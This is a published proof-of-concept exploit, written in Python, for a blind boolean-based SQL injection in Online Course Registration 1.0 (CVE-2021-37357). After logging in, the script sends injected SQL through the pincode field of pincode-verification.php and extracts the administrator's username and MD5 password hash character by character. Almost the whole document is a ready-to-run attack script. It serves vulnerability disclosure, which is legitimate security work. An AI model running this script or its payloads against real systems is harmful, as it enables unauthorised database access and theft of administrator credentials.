# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated) # Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec) # Date: 2021-10-21 # Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip # Version: 1.0 # Tested On: Windows 10 + XAMPP + Python 3 # Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers # with access to the username and md5 hash of any administrators. # Vulnerable file: /online-course-registration/Online/pincode-verification.php # Proof of Concept: #!/usr/bin/python3 import requests import sys import string def exploit(hostname, username, password): # Building bruteforce list pass_list = list(string.ascii_lowercase) pass_list += list(range(0,10)) pass_list = map(str, pass_list) pass_list = list(pass_list) user_list = pass_list user_list += list(string.ascii_uppercase) user_list = map(str, user_list) user_list = list(user_list) session = requests.Session() # This URL may change based on the implementation - change as needed url = f"{hostname}/online-course-registration/Online/index.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"regno": f"{username}", "password": f"{password}", "submit": ''} r = session.post(url, headers=headers, data=data) print("Admin username:") # This range number is pretty arbitrary, so change it to whatever you feel like for i in range(1,33): counter = 0 find = False for j in user_list: # This URL may change based on the implementation - change as needed url = f"{hostname}/online-course-registration/Online/pincode-verification.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} a = session.post(url, headers=headers, data=data) counter += 1 if 'Course Enroll' in a.text: sys.stdout.write(j) sys.stdout.flush() break elif counter == len(user_list): find = True break if find: break print("\n") print("Admin password hash:") # This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed for i in range(1,33): counter = 0 find = False for j in pass_list: url = f"{hostname}/online-course-registration/Online/pincode-verification.php" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''} a = session.post(url, headers=headers, data=data) counter += 1 if 'Course Enroll' in a.text: sys.stdout.write(j) sys.stdout.flush() break elif counter == len(pass_list): find = True break if find: break print("\n\nSuccessfully pwnd :)") def logo(): art = R''' __/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__ _\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__ _\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__ _\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__ _\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__ _\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__ _\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__ _\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_ _\///______________\///////////__\///_____\/////__________\///////\//__ ''' info = 'CVE-2021-37357 PoC'.center(76) credits = 'Created by @AffineSecurity and @qhum7sec'.center(76) print(f"{art}\n{info}\n{credits}") def main(): logo() hostname = sys.argv[1] username = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 4: print("Usage: python3 exploit.py http://127.0.0.1:80 username password") exploit(hostname, username, password) if __name__ == '__main__': main()